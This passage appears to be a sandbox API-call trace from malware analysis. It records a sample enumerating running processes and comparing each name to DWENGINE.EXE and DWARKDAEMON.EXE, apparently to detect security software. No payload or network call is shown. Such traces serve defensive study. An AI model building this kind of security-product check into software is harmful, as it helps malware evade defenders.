th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.472] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.472] lstrlenW (lpString="isolation.exe") returned 13 [0163.472] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.472] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.472] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.473] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.473] lstrlenW (lpString="abc.exe") returned 7 [0163.473] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.473] lstrcmpW (lpString1="ABC.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.473] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.474] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.474] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.474] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.474] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.474] Process32NextW 
(in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.475] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.475] lstrlenW (lpString="english_performing.exe") returned 22 [0163.475] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.475] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.475] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.475] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.475] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.475] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.475] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.475] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.476] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.476] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.476] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 
| out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.476] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.476] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.477] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.477] lstrlenW (lpString="volume.exe") returned 10 [0163.477] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.477] lstrcmpW (lpString1="VOLUME.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.477] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.478] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.478] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.478] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.478] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.478] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.478] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.478] lstrlenW 
(lpString="objectives-bailey-audit.exe") returned 27 [0163.478] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.478] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.478] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.479] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.479] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.479] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.479] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.479] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.480] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.480] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.480] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.480] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.480] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.480] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.481] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.481] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.481] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.481] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.481] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.481] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.481] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.481] lstrcmpW (lpString1="EXCEL.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.481] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.482] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.482] lstrlenW (lpString="svchost.exe") returned 11 [0163.482] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.482] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.482] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.483] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.483] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.483] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.483] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.483] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.483] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.483] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.483] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.483] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.483] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.486] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.486] lstrlenW (lpString="svchost.exe") returned 11 [0163.486] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.486] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.486] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.487] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.487] lstrlenW (lpString="svchost.exe") returned 11 [0163.487] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.487] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.487] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.488] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.488] lstrlenW (lpString="winpoint.exe") returned 12 [0163.488] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.488] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.488] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.488] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.488] lstrlenW (lpString="cmd.exe") returned 7 [0163.488] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.488] lstrcmpW (lpString1="CMD.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.488] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.489] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.489] lstrlenW (lpString="conhost.exe") returned 11 [0163.489] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.489] lstrcmpW (lpString1="CONHOST.EXE", lpString2="DWENGINE.EXE") returned -1 [0163.489] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.490] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.490] lstrlenW (lpString="PING.EXE") returned 8 [0163.490] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.490] lstrcmpW (lpString1="PING.EXE", lpString2="DWENGINE.EXE") returned 1 [0163.490] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.490] CloseHandle (hObject=0xe0) returned 1 [0163.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.492] lstrcpyW (in: lpString1=0x18f8e4, lpString2="DWARKDAEMON.EXE" | out: lpString1="DWARKDAEMON.EXE") returned="DWARKDAEMON.EXE" [0163.492] lstrlenW (lpString="DWARKDAEMON.EXE") returned 15 [0163.492] CharUpperBuffW (in: lpsz="DWARKDAEMON.EXE", cchLength=0xf | out: lpsz="DWARKDAEMON.EXE") returned 0xf [0163.492] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.493] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.493] lstrlenW (lpString="[System Process]") returned 16 [0163.493] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.493] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="DWARKDAEMON.EXE") returned -1 [0163.493] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.493] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.494] lstrlenW (lpString="System") returned 6 [0163.494] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.494] lstrcmpW (lpString1="SYSTEM", lpString2="DWARKDAEMON.EXE") returned 1 [0163.494] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.494] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.494] lstrlenW (lpString="smss.exe") returned 8 [0163.494] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.494] lstrcmpW (lpString1="SMSS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.494] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, 
pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.495] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.495] lstrlenW (lpString="csrss.exe") returned 9 [0163.495] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.495] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.495] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.496] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.496] lstrlenW (lpString="wininit.exe") returned 11 [0163.496] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.496] lstrcmpW (lpString1="WININIT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.496] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.496] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.496] lstrlenW (lpString="csrss.exe") returned 9 [0163.496] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.496] lstrcmpW (lpString1="CSRSS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.496] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) 
returned 1 [0163.497] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.497] lstrlenW (lpString="winlogon.exe") returned 12 [0163.497] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.497] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.497] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.498] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.498] lstrlenW (lpString="services.exe") returned 12 [0163.498] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.498] lstrcmpW (lpString1="SERVICES.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.498] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.498] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.498] lstrlenW (lpString="lsass.exe") returned 9 [0163.498] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.498] lstrcmpW (lpString1="LSASS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.498] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.499] lstrcpyW (in: 
lpString1=0x18f6dc, lpString2="lsm.exe" | out: lpString1="lsm.exe") returned="lsm.exe" [0163.499] lstrlenW (lpString="lsm.exe") returned 7 [0163.501] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.501] lstrcmpW (lpString1="LSM.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.501] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.502] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.502] lstrlenW (lpString="svchost.exe") returned 11 [0163.502] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.502] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.502] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.502] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.503] lstrlenW (lpString="svchost.exe") returned 11 [0163.503] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.503] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.503] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.503] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: 
lpString1="svchost.exe") returned="svchost.exe" [0163.503] lstrlenW (lpString="svchost.exe") returned 11 [0163.503] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.503] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.503] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.504] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.504] lstrlenW (lpString="svchost.exe") returned 11 [0163.504] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.504] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.504] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, 